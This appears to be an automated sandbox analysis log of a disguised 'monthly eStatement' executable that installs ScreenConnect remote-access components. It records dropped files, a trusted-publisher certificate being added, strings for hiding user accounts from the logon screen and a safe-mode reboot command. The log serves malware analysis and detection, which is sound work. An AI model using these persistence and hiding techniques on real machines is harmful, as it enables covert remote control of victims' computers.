                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B435D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4246000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B3EB7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.1567594933.0000000002CD2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.3155817267.00000000029B0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.3156144988.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1558755338.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1563335386.0000000000C4D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3EB3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4242000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4383000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1570550715.000000001C112000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1558755338.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3EB3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4242000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4383000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1570550715.000000001C112000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B424A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4325000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B3EBB000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1569312203.0000000002F12000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3EAB000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.1568117293.0000000005462000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.Client.dll.1.drStatic PE information: 0xB8CD3C5A [Sat Mar 31 22:21:14 2068 UTC]
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F21000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00F21000
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: real checksum: 0x1bda6 should be: 0x1d486
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F21BC0 push ecx; ret 0_2_00F21BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC35D2A5 pushad ; iretd 1_2_00007FFAAC35D2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC47A798 push ebp; retn 5F4Ah1_2_00007FFAAC4A7A28
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC4951F8 pushfd ; retf 1_2_00007FFAAC495991
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC477D00 push eax; retf 1_2_00007FFAAC477D1D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC494C6D push edx; retn 000Eh1_2_00007FFAAC494C6E
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC47842E pushad ; ret 1_2_00007FFAAC47845D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC47845E push eax; ret 1_2_00007FFAAC47846D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAAC452D68 push eax; ret 7_2_00007FFAAC452E7B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAAC453F3A pushad ; retf 7_2_00007FFAAC453F3B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAAC45401A push eax; iretd 7_2_00007FFAAC45401B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAAC452FDA pushad ; retf 7_2_00007FFAAC452FDB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAAC4530BA push eax; iretd 7_2_00007FFAAC4530BB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAAC454162 push eax; ret 7_2_00007FFAAC454163
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeCode function: 8_2_010A1247 push esp; retf 8_2_010A1251
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeCode function: 8_2_010A18B1 push 54053933h; retf 8_2_010A18BD
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFAAC777B30 push ss; iretd 10_2_00007FFAAC777B31
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Windows.dllJump to dropped file
                  Source: ScreenConnect.ClientService.dll.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                  Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\ConfigJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.1570550715.000000001C112000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 00000008.00000002.1567594933.0000000002CD2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.3155817267.00000000029B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.3156144988.0000000002A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
